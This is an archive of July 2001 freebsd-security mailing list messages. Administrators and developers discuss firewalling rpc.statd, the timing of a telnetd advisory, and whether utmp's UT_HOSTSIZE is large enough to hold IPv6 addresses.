From owner-freebsd-security Sun Jul 22 3:50:52 2001 Delivered-To: freebsd-security@freebsd.org Received: from thedarkside.nl (cc31301-a.assen1.dr.nl.home.com [213.51.66.128]) by hub.freebsd.org (Postfix) with ESMTP id 6CBC337B405 for ; Sun, 22 Jul 2001 03:50:42 -0700 (PDT) (envelope-from serkoon@thedarkside.nl) Received: (from root@localhost) by thedarkside.nl (?/8.9.3) id f6MAoe223459 for freebsd-security@freebsd.org; Sun, 22 Jul 2001 12:50:40 +0200 (CEST) (envelope-from serkoon@thedarkside.nl) Received: from kilmarnock (kilmarnock [10.0.0.2]) by thedarkside.nl (?/8.9.3av) with SMTP id f6MAoZX23451 for ; Sun, 22 Jul 2001 12:50:35 +0200 (CEST) (envelope-from serkoon@thedarkside.nl) Message-ID: <002e01c1129c$5b0ef6b0$0200000a@kilmarnock> From: "serkoon" To: References: Subject: Re: rpc.statd attacks Date: Sun, 22 Jul 2001 12:52:08 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > However, since I have port 111 blocked in the firewall, > how in the world is even an error message being generated? > I have even portscanned and 111 is not open to the outside. Firewall UDP:111 or kill portmapd (if you don't need it). To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jul 22 9: 9:40 2001 Delivered-To: freebsd-security@freebsd.org Received: from erouter0.it-datacntr.louisville.edu (erouter0.it-datacntr.louisville.edu [136.165.1.36]) by hub.freebsd.org (Postfix) with ESMTP id 9E2AF37B403 for ; Sun, 22 Jul 2001 09:09:37 -0700 (PDT) (envelope-from keith.stevenson@louisville.edu) Received: from osaka.louisville.edu (osaka.louisville.edu [136.165.1.114]) by erouter0.it-datacntr.louisville.edu (Postfix) with ESMTP id 273153B025; Sun, 22 Jul 2001 12:09:37 -0400 (EDT) Received: by osaka.louisville.edu (Postfix, from userid 15) id C56191862E; Sun, 22 Jul 2001 12:09:32 -0400 (EDT) Date: Sun, 22 Jul 2001 12:09:32 -0400 From: Keith Stevenson To: Kris Kennaway Cc: security@freebsd.org Subject: Re: telnetd root exploit Message-ID: <20010722120932.E56521@osaka.louisville.edu> References: <20010721144337.B90359@xor.obsecurity.org> <20010721215005.70250.qmail@web11606.mail.yahoo.com> <20010721145355.A4238@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010721145355.A4238@xor.obsecurity.org>; from kris@obsecurity.org on Sat, Jul 21, 2001 at 02:53:55PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sat, Jul 21, 2001 at 02:53:55PM -0700, Kris Kennaway wrote: > On Sat, Jul 21, 2001 at 02:50:05PM -0700, Holtor wrote: > > Any idea when the official advisory will be sent? > > I don't want to think i'm patched and restart telnetd > > only to be rooted by some lame script kiddie. Thanks > > much. > > Probably Monday. I have a small suggestion for this and future advisories. Could you include which file versions are "fixed"? For example, in addition to stating that the problem was resolved on a certain date, also include that the fix is in foo.c version (mumble). It would help make certain that I am indeed patched. (Yes, I do read the commit messages, but I've been known to miss these things.) Regards, --Keith Stevenson-- -- Keith Stevenson System Programmer - Data Center Services - University of Louisville keith.stevenson@louisville.edu GPG key fingerprint = 332D 97F0 6321 F00F 8EE7 2D44 00D8 F384 75BB 89AE To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jul 22 11: 8: 3 2001 Delivered-To: freebsd-security@freebsd.org Received: from falcon.mail.pas.earthlink.net (falcon.mail.pas.earthlink.net [207.217.120.74]) by hub.freebsd.org (Postfix) with ESMTP id EE88637B405 for ; Sun, 22 Jul 2001 11:07:58 -0700 (PDT) (envelope-from cjc@earthlink.net) Received: from blossom.cjclark.org (dialup-209.247.142.113.Dial1.SanJose1.Level3.net [209.247.142.113]) by falcon.mail.pas.earthlink.net (EL-8_9_3_3/8.9.3) with ESMTP id LAA10501; Sun, 22 Jul 2001 11:07:57 -0700 (PDT) Received: (from cjc@localhost) by blossom.cjclark.org (8.11.4/8.11.3) id f6MI7tX00831; Sun, 22 Jul 2001 11:07:55 -0700 (PDT) (envelope-from cjc) Date: Sun, 22 Jul 2001 11:07:55 -0700 From: "Crist J. Clark" To: serkoon Cc: freebsd-security@FreeBSD.ORG Subject: Re: rpc.statd attacks Message-ID: <20010722110755.B323@blossom.cjclark.org> Reply-To: cjclark@alum.mit.edu References: <002e01c1129c$5b0ef6b0$0200000a@kilmarnock> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <002e01c1129c$5b0ef6b0$0200000a@kilmarnock>; from serkoon@thedarkside.nl on Sun, Jul 22, 2001 at 12:52:08PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sun, Jul 22, 2001 at 12:52:08PM +0200, serkoon wrote: > > However, since I have port 111 blocked in the firewall, > > how in the world is even an error message being generated? > > I have even portscanned and 111 is not open to the outside. > > Firewall UDP:111 or kill portmapd (if you don't need it). 1) You do not allow traffic to 111/tcp OR 111/udp, do you? 2) Just because you block port 111 doesn't mean people cannot attack rpc.statd. Blocking 111 just makes finding the ports that rpc.statd is listening on a little harder, but not difficult. Don't "block" port 111. Pass only traffic you want and expect, block everything else by default. -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jul 22 13:35:37 2001 Delivered-To: freebsd-security@freebsd.org Received: from light.imasy.or.jp (light.imasy.or.jp [202.227.24.4]) by hub.freebsd.org (Postfix) with ESMTP id 8EC3B37B401; Sun, 22 Jul 2001 13:35:33 -0700 (PDT) (envelope-from ume@mahoroba.org) Received: (from uucp@localhost) by light.imasy.or.jp (8.11.3+3.4W/8.11.3/light/smtpfeed 1.12) with UUCP id f6MKZQg17646; Mon, 23 Jul 2001 05:35:26 +0900 (JST) (envelope-from ume@mahoroba.org) Received: from peace.mahoroba.org (IDENT:CjQCnFWFbFedMOzpFXmAbhRKtRFx78HQ5gK+LBCsMh3m2aPmH9ukvTRvA+FyjYbP@peace.mahoroba.org [3ffe:505:2:0:200:f8ff:fe05:3eae]) (authenticated as ume with CRAM-MD5) by mail.mahoroba.org (8.11.4/8.11.4/chaos) with ESMTP/inet6 id f6MKUsL28616; Mon, 23 Jul 2001 05:30:54 +0900 (JST) (envelope-from ume@mahoroba.org) Date: Mon, 23 Jul 2001 05:30:51 +0900 (JST) Message-Id: <20010723.053051.88524825.ume@mahoroba.org> To: brian@Awfulhak.org Cc: ras@e-gerbil.net, roam@orbitel.bg, freebsd-security@FreeBSD.org, freebsd-gnats-submit@FreeBSD.org Subject: Re: bin/22595: telnetd tricked into using arbitrary peer ip From: Hajimu UMEMOTO In-Reply-To: <200107212234.f6LMYUg79964@hak.lan.Awfulhak.org> References: <200107212234.f6LMYUg79964@hak.lan.Awfulhak.org> X-Mailer: xcite1.38> Mew version 1.95b119 on Emacs 20.7 / Mule 4.0 =?iso-2022-jp?B?KBskQjJWMWMbKEIp?= X-PGP-Public-Key: http://www.imasy.org/~ume/publickey.asc X-PGP-Fingerprint: 6B 0C 53 FC 5D D0 37 91 05 D0 B3 EF 36 9B 6A BC X-URL: http://www.imasy.org/~ume/ X-Operating-System: FreeBSD 5.0-CURRENT Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >>>>> On Sat, 21 Jul 2001 23:34:30 +0100 >>>>> Brian Somers said: brian> Yes, there is a problem where we've basically trusted a DNS that we brian> don't own -- and that is a risk. But I can't see why 9.8.7.6 is brian> relevant, *except* that ``w -n'' may be mentioning it. brian> Am I misinterpreting things or is the real problem that a forward and brian> reverse DNS can both conspire against you ? Or is the real problem brian> just ``w''s -n flag ? It is problem of w(1). `w -n' does forward lookup for IPv4 only and IPv6 is not supported at all. When available, login(1) writes hostname into utmp instead of IP address. If hostname is saved, `w -n' queries A RR for the hostname. Real problem is that UT_HOSTSIZE is too short to hold IPv6 address. Is there any chance to expand UT_HOSTSIZE in time to 5.0-RELEASE. It apparently breaks binary compatibility. -- Hajimu UMEMOTO @ Internet Mutual Aid Society Yokohama, Japan ume@mahoroba.org ume@bisd.hitachi.co.jp ume@{,jp.}FreeBSD.org http://www.imasy.org/~ume/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jul 22 13:38:23 2001 Delivered-To: freebsd-security@freebsd.org Received: from overlord.e-gerbil.net (e-gerbil.net [207.91.110.247]) by hub.freebsd.org (Postfix) with ESMTP id 0E3D237B401; Sun, 22 Jul 2001 13:38:21 -0700 (PDT) (envelope-from ras@e-gerbil.net) Received: by overlord.e-gerbil.net (Postfix, from userid 1001) id 7F73EE5004; Sun, 22 Jul 2001 16:38:14 -0400 (EDT) Received: from localhost (localhost [127.0.0.1]) by overlord.e-gerbil.net (Postfix) with ESMTP id 1C5EAE4CFC; Sun, 22 Jul 2001 16:38:14 -0400 (EDT) Date: Sun, 22 Jul 2001 16:38:13 -0400 (EDT) From: "Richard A. Steenbergen" To: Hajimu UMEMOTO Cc: brian@Awfulhak.org, roam@orbitel.bg, freebsd-security@FreeBSD.org, freebsd-gnats-submit@FreeBSD.org Subject: Re: bin/22595: telnetd tricked into using arbitrary peer ip In-Reply-To: <20010723.053051.88524825.ume@mahoroba.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, 23 Jul 2001, Hajimu UMEMOTO wrote: > >>>>> On Sat, 21 Jul 2001 23:34:30 +0100 > >>>>> Brian Somers said: > > brian> Yes, there is a problem where we've basically trusted a DNS that we > brian> don't own -- and that is a risk. But I can't see why 9.8.7.6 is > brian> relevant, *except* that ``w -n'' may be mentioning it. > > brian> Am I misinterpreting things or is the real problem that a forward and > brian> reverse DNS can both conspire against you ? Or is the real problem > brian> just ``w''s -n flag ? > > It is problem of w(1). `w -n' does forward lookup for IPv4 only and > IPv6 is not supported at all. When available, login(1) writes > hostname into utmp instead of IP address. If hostname is saved, `w > -n' queries A RR for the hostname. > Real problem is that UT_HOSTSIZE is too short to hold IPv6 address. > Is there any chance to expand UT_HOSTSIZE in time to 5.0-RELEASE. It > apparently breaks binary compatibility. This is not the problem here, login is writing the false IP to utmp. -- Richard A Steenbergen http://www.e-gerbil.net/ras PGP Key ID: 0x138EA177 (67 29 D7 BC E8 18 3E DA B2 46 B3 D8 14 36 FE B6) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jul 22 14: 4:44 2001 Delivered-To: freebsd-security@freebsd.org Received: from thedarkside.nl (cc31301-a.assen1.dr.nl.home.com [213.51.66.128]) by hub.freebsd.org (Postfix) with ESMTP id 16A2137B405 for ; Sun, 22 Jul 2001 14:04:41 -0700 (PDT) (envelope-from serkoon@thedarkside.nl) Received: (from root@localhost) by thedarkside.nl (?/8.9.3) id f6ML4e725422 for freebsd-security@freebsd.org; Sun, 22 Jul 2001 23:04:40 +0200 (CEST) (envelope-from serkoon@thedarkside.nl) Received: from kilmarnock (kilmarnock [10.0.0.2]) by thedarkside.nl (?/8.9.3av) with SMTP id f6ML4aX25414 for ; Sun, 22 Jul 2001 23:04:36 +0200 (CEST) (envelope-from serkoon@thedarkside.nl) Message-ID: <002501c112f2$208d47c0$0200000a@kilmarnock> From: "serkoon" To: References: <002e01c1129c$5b0ef6b0$0200000a@kilmarnock> <20010722110755.B323@blossom.cjclark.org> Subject: Re: rpc.statd attacks Date: Sun, 22 Jul 2001 23:06:07 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Chris wrote: > Don't "block" port 111. Pass only traffic you want and expect, block > everything else by default. Yes, I should have made that more clear, but since I don't have it setup that way, at least for UDP, it didn't occur to me. One should use stateful filtering for this to work right. (Don't ever allow udp from any:53 to $yourip). With regards To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jul 22 14:10: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from light.imasy.or.jp (light.imasy.or.jp [202.227.24.4]) by hub.freebsd.org (Postfix) with ESMTP id 7C4F437B406; Sun, 22 Jul 2001 14:09:57 -0700 (PDT) (envelope-from ume@mahoroba.org) Received: (from uucp@localhost) by light.imasy.or.jp (8.11.3+3.4W/8.11.3/light/smtpfeed 1.12) with UUCP id f6ML9sd18851; Mon, 23 Jul 2001 06:09:54 +0900 (JST) (envelope-from ume@mahoroba.org) Received: from peace.mahoroba.org (IDENT:vC0v9KIPS08hEVG4h5zYjibu75J1U5GJxUfr5LRR6jRFyaW9J43iRN8mRzN5DNPv@peace.mahoroba.org [3ffe:505:2:0:200:f8ff:fe05:3eae]) (authenticated as ume with CRAM-MD5) by mail.mahoroba.org (8.11.4/8.11.4/chaos) with ESMTP/inet6 id f6ML9ZL28750; Mon, 23 Jul 2001 06:09:36 +0900 (JST) (envelope-from ume@mahoroba.org) Date: Mon, 23 Jul 2001 06:09:35 +0900 (JST) Message-Id: <20010723.060935.70171168.ume@mahoroba.org> To: ras@e-gerbil.net Cc: brian@Awfulhak.org, roam@orbitel.bg, freebsd-security@FreeBSD.org, freebsd-gnats-submit@FreeBSD.org Subject: Re: bin/22595: telnetd tricked into using arbitrary peer ip From: Hajimu UMEMOTO In-Reply-To: References: <20010723.053051.88524825.ume@mahoroba.org> X-Mailer: xcite1.38> Mew version 1.95b119 on Emacs 20.7 / Mule 4.0 =?iso-2022-jp?B?KBskQjJWMWMbKEIp?= X-PGP-Public-Key: http://www.imasy.org/~ume/publickey.asc X-PGP-Fingerprint: 6B 0C 53 FC 5D D0 37 91 05 D0 B3 EF 36 9B 6A BC X-URL: http://www.imasy.org/~ume/ X-Operating-System: FreeBSD 5.0-CURRENT Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >>>>> On Sun, 22 Jul 2001 16:38:13 -0400 (EDT) >>>>> "Richard A. Steenbergen" said: ras> On Mon, 23 Jul 2001, Hajimu UMEMOTO wrote: > >>>>> On Sat, 21 Jul 2001 23:34:30 +0100 > >>>>> Brian Somers said: > > brian> Yes, there is a problem where we've basically trusted a DNS that we > brian> don't own -- and that is a risk. But I can't see why 9.8.7.6 is > brian> relevant, *except* that ``w -n'' may be mentioning it. > > brian> Am I misinterpreting things or is the real problem that a forward and > brian> reverse DNS can both conspire against you ? Or is the real problem > brian> just ``w''s -n flag ? > > It is problem of w(1). `w -n' does forward lookup for IPv4 only and > IPv6 is not supported at all. When available, login(1) writes > hostname into utmp instead of IP address. If hostname is saved, `w > -n' queries A RR for the hostname. > Real problem is that UT_HOSTSIZE is too short to hold IPv6 address. > Is there any chance to expand UT_HOSTSIZE in time to 5.0-RELEASE. It > apparently breaks binary compatibility. ras> This is not the problem here, login is writing the false IP to utmp. I cannot agree with you here. You did ssh via IPv6. login(1) cannot write IPv6 address into utmp. In this case, realhostname_sa(3) returns hostname. The cases that IP address is saved are: - reverse or forward lookup was failed, - the result of reverse -> forward lookup doesn't match against the address, or - IPv4 Even if IPv6 address is saved, since it is chopped, it will fail to do reverse lookup. -- Hajimu UMEMOTO @ Internet Mutual Aid Society Yokohama, Japan ume@mahoroba.org ume@bisd.hitachi.co.jp ume@{,jp.}FreeBSD.org http://www.imasy.org/~ume/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jul 22 14:18:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67]) by hub.freebsd.org (Postfix) with ESMTP id C54CE37B403; Sun, 22 Jul 2001 14:18:14 -0700 (PDT) (envelope-from dillon@earth.backplane.com) Received: (from dillon@localhost) by earth.backplane.com (8.11.4/8.11.2) id f6MLHwr11669; Sun, 22 Jul 2001 14:17:58 -0700 (PDT) (envelope-from dillon) Date: Sun, 22 Jul 2001 14:17:58 -0700 (PDT) From: Matt Dillon Message-Id: <200107222117.f6MLHwr11669@earth.backplane.com> To: Hajimu UMEMOTO Cc: brian@Awfulhak.org, ras@e-gerbil.net, roam@orbitel.bg, freebsd-security@FreeBSD.ORG, freebsd-gnats-submit@FreeBSD.ORG Subject: Re: bin/22595: telnetd tricked into using arbitrary peer ip References: <200107212234.f6LMYUg79964@hak.lan.Awfulhak.org> <20010723.053051.88524825.ume@mahoroba.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org :It is problem of w(1). `w -n' does forward lookup for IPv4 only and :IPv6 is not supported at all. When available, login(1) writes :hostname into utmp instead of IP address. If hostname is saved, `w :-n' queries A RR for the hostname. :Real problem is that UT_HOSTSIZE is too short to hold IPv6 address. :Is there any chance to expand UT_HOSTSIZE in time to 5.0-RELEASE. It :apparently breaks binary compatibility. : :-- :Hajimu UMEMOTO @ Internet Mutual Aid Society Yokohama, Japan :ume@mahoroba.org ume@bisd.hitachi.co.jp ume@{,jp.}FreeBSD.org I think if we are going to increase UT_HOSTSIZE, then 5.0 (i.e. now) is exactly the right time to do it. How large does UT_HOSTSIZE have to be to accomodate an IPV6 address? -Matt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jul 22 14:21:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from science.slc.edu (Science.SLC.Edu [198.83.6.248]) by hub.freebsd.org (Postfix) with ESMTP id A75DE37B405; Sun, 22 Jul 2001 14:21:10 -0700 (PDT) (envelope-from aschneid@science.slc.edu) Received: (from aschneid@localhost) by science.slc.edu (8.11.0/8.11.0) id f6MLMWk94328; Sun, 22 Jul 2001 17:22:32 -0400 (EDT) (envelope-from aschneid) Date: Sun, 22 Jul 2001 17:22:32 -0400 From: Anthony Schneider To: Matt Dillon Cc: Hajimu UMEMOTO , brian@Awfulhak.org, ras@e-gerbil.net, roam@orbitel.bg, freebsd-security@FreeBSD.ORG, freebsd-gnats-submit@FreeBSD.ORG Subject: Re: bin/22595: telnetd tricked into using arbitrary peer ip Message-ID: <20010722172232.A94306@mail.slc.edu> References: <200107212234.f6LMYUg79964@hak.lan.Awfulhak.org> <20010723.053051.88524825.ume@mahoroba.org> <200107222117.f6MLHwr11669@earth.backplane.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200107222117.f6MLHwr11669@earth.backplane.com>; from dillon@earth.backplane.com on Sun, Jul 22, 2001 at 02:17:58PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org 16 bytes. On Sun, Jul 22, 2001 at 02:17:58PM -0700, Matt Dillon wrote: > > :It is problem of w(1). `w -n' does forward lookup for IPv4 only and > :IPv6 is not supported at all. When available, login(1) writes > :hostname into utmp instead of IP address. If hostname is saved, `w > :-n' queries A RR for the hostname. > :Real problem is that UT_HOSTSIZE is too short to hold IPv6 address. > :Is there any chance to expand UT_HOSTSIZE in time to 5.0-RELEASE. It > :apparently breaks binary compatibility. > : > :-- > :Hajimu UMEMOTO @ Internet Mutual Aid Society Yokohama, Japan > :ume@mahoroba.org ume@bisd.hitachi.co.jp ume@{,jp.}FreeBSD.org > > I think if we are going to increase UT_HOSTSIZE, then 5.0 (i.e. now) > is exactly the right time to do it. How large does UT_HOSTSIZE > have to be to accomodate an IPV6 address? > > -Matt > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jul 22 14:30: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (discworld.nanolink.com [195.24.48.189]) by hub.freebsd.org (Postfix) with SMTP id 97EFE37B406 for ; Sun, 22 Jul 2001 14:29:58 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 3342 invoked by uid 1000); 22 Jul 2001 21:29:12 -0000 Date: Mon, 23 Jul 2001 00:29:12 +0300 From: Peter Pentchev To: Anthony Schneider Cc: Matt Dillon , Hajimu UMEMOTO , brian@Awfulhak.org, ras@e-gerbil.net, freebsd-security@FreeBSD.ORG, freebsd-gnats-submit@FreeBSD.ORG Subject: Re: bin/22595: telnetd tricked into using arbitrary peer ip Message-ID: <20010723002912.H882@ringworld.oblivion.bg> Mail-Followup-To: Anthony Schneider , Matt Dillon , Hajimu UMEMOTO , brian@Awfulhak.org, ras@e-gerbil.net, freebsd-security@FreeBSD.ORG, freebsd-gnats-submit@FreeBSD.ORG References: <200107212234.f6LMYUg79964@hak.lan.Awfulhak.org> <20010723.053051.88524825.ume@mahoroba.org> <200107222117.f6MLHwr11669@earth.backplane.com> <20010722172232.A94306@mail.slc.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010722172232.A94306@mail.slc.edu>; from aschneid@mail.slc.edu on Sun, Jul 22, 2001 at 05:22:32PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Not really; I'd think that utmp structures hold an ASCII string, not the binary address representation. Thus, the current UT_HOSTSIZE of 16 is quite enough to hold an IPv4 address (4*3 + 3 dots), but not nearly enough for full-blown IPv6 addresses. G'luck, Peter -- If this sentence didn't exist, somebody would have invented it. On Sun, Jul 22, 2001 at 05:22:32PM -0400, Anthony Schneider wrote: > 16 bytes. > > On Sun, Jul 22, 2001 at 02:17:58PM -0700, Matt Dillon wrote: > > > > :It is problem of w(1). `w -n' does forward lookup for IPv4 only and > > :IPv6 is not supported at all. When available, login(1) writes > > :hostname into utmp instead of IP address. If hostname is saved, `w > > :-n' queries A RR for the hostname. > > :Real problem is that UT_HOSTSIZE is too short to hold IPv6 address. > > :Is there any chance to expand UT_HOSTSIZE in time to 5.0-RELEASE. It > > :apparently breaks binary compatibility. > > : > > :-- > > :Hajimu UMEMOTO @ Internet Mutual Aid Society Yokohama, Japan > > :ume@mahoroba.org ume@bisd.hitachi.co.jp ume@{,jp.}FreeBSD.org > > > > I think if we are going to increase UT_HOSTSIZE, then 5.0 (i.e. now) > > is exactly the right time to do it. How large does UT_HOSTSIZE > > have to be to accomodate an IPV6 address? > > > > -Matt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jul 22 14:35:36 2001 Delivered-To: freebsd-security@freebsd.org Received: from light.imasy.or.jp (light.imasy.or.jp [202.227.24.4]) by hub.freebsd.org (Postfix) with ESMTP id 2C45337B401; Sun, 22 Jul 2001 14:35:31 -0700 (PDT) (envelope-from ume@mahoroba.org) Received: (from uucp@localhost) by light.imasy.or.jp (8.11.3+3.4W/8.11.3/light/smtpfeed 1.12) with UUCP id f6MLZSD19667; Mon, 23 Jul 2001 06:35:28 +0900 (JST) (envelope-from ume@mahoroba.org) Received: from peace.mahoroba.org (IDENT:JbIzFlZwvxt8C3QfJr2Fb6uDplSprM2BzW8r0bScfSHFhh1d38GBKheyjGHbGGOv@peace.mahoroba.org [2001:200:301:0:200:f8ff:fe05:3eae]) (authenticated as ume with CRAM-MD5) by mail.mahoroba.org (8.11.4/8.11.4/chaos) with ESMTP/inet6 id f6MLYwL28854; Mon, 23 Jul 2001 06:34:58 +0900 (JST) (envelope-from ume@mahoroba.org) Date: Mon, 23 Jul 2001 06:34:58 +0900 (JST) Message-Id: <20010723.063458.35714423.ume@mahoroba.org> To: aschneid@mail.slc.edu Cc: dillon@earth.backplane.com, brian@Awfulhak.org, ras@e-gerbil.net, roam@orbitel.bg, freebsd-security@FreeBSD.ORG, freebsd-gnats-submit@FreeBSD.ORG Subject: Re: bin/22595: telnetd tricked into using arbitrary peer ip From: Hajimu UMEMOTO In-Reply-To: <20010722172232.A94306@mail.slc.edu> References: <20010723.053051.88524825.ume@mahoroba.org> <200107222117.f6MLHwr11669@earth.backplane.com> <20010722172232.A94306@mail.slc.edu> X-Mailer: xcite1.38> Mew version 1.95b119 on Emacs 20.7 / Mule 4.0 =?iso-2022-jp?B?KBskQjJWMWMbKEIp?= X-PGP-Public-Key: http://www.imasy.org/~ume/publickey.asc X-PGP-Fingerprint: 6B 0C 53 FC 5D D0 37 91 05 D0 B3 EF 36 9B 6A BC X-URL: http://www.imasy.org/~ume/ X-Operating-System: FreeBSD 5.0-CURRENT Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >>>>> On Sun, 22 Jul 2001 17:22:32 -0400 >>>>> Anthony Schneider said: aschneid> 16 bytes. It's a binary form. We need 40 bytes for global address. To save site-local or link-local address, we need more space for scope identifier. I believe the length of scope identifier is not defined and system specific. global address: 1234567890123456789012345678901234567890 NNNN:NNNN:NNNN:NNNN:NNNN:NNNN:NNNN:NNNN\n scoped address: 1234567890123456789012345678901234567890 NNNN:NNNN:NNNN:NNNN:NNNN:NNNN:NNNN:NNNN%fxp0\n There is one more consideration. `:' is conflict with X. I have no particular idea to solve this problem. Enclosing IPv6 address with `[' and `]' doesn't help without changing X side. -- Hajimu UMEMOTO @ Internet Mutual Aid Society Yokohama, Japan ume@mahoroba.org ume@bisd.hitachi.co.jp ume@{,jp.}FreeBSD.org http://www.imasy.org/~ume/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jul 22 15:58:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67]) by hub.freebsd.org (Postfix) with ESMTP id EB1E037B413; Sun, 22 Jul 2001 15:58:08 -0700 (PDT) (envelope-from dillon@earth.backplane.com) Received: (from dillon@localhost) by earth.backplane.com (8.11.4/8.11.2) id f6MMvuE12313; Sun, 22 Jul 2001 15:57:56 -0700 (PDT) (envelope-from dillon) Date: Sun, 22 Jul 2001 15:57:56 -0700 (PDT) From: Matt Dillon Message-Id: <200107222257.f6MMvuE12313@earth.backplane.com> To: Hajimu UMEMOTO Cc: aschneid@mail.slc.edu, dillon@earth.backplane.com, brian@Awfulhak.org, ras@e-gerbil.net, roam@orbitel.bg, freebsd-security@FreeBSD.ORG, freebsd-gnats-submit@FreeBSD.ORG Subject: Re: bin/22595: telnetd tricked into using arbitrary peer ip References: <20010723.053051.88524825.ume@mahoroba.org> <200107222117.f6MLHwr11669@earth.backplane.com> <20010722172232.A94306@mail.slc.edu> <20010723.063458.35714423.ume@mahoroba.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org :>>>>> On Sun, 22 Jul 2001 17:22:32 -0400 :>>>>> Anthony Schneider said: : :aschneid> 16 bytes. : :It's a binary form. We need 40 bytes for global address. To save :site-local or link-local address, we need more space for scope :identifier. I believe the length of scope identifier is not defined :and system specific. : :global address: : : 1234567890123456789012345678901234567890 : NNNN:NNNN:NNNN:NNNN:NNNN:NNNN:NNNN:NNNN\n : :scoped address: : : 1234567890123456789012345678901234567890 : NNNN:NNNN:NNNN:NNNN:NNNN:NNNN:NNNN:NNNN%fxp0\n : :There is one more consideration. `:' is conflict with X. I have no :particular idea to solve this problem. Enclosing 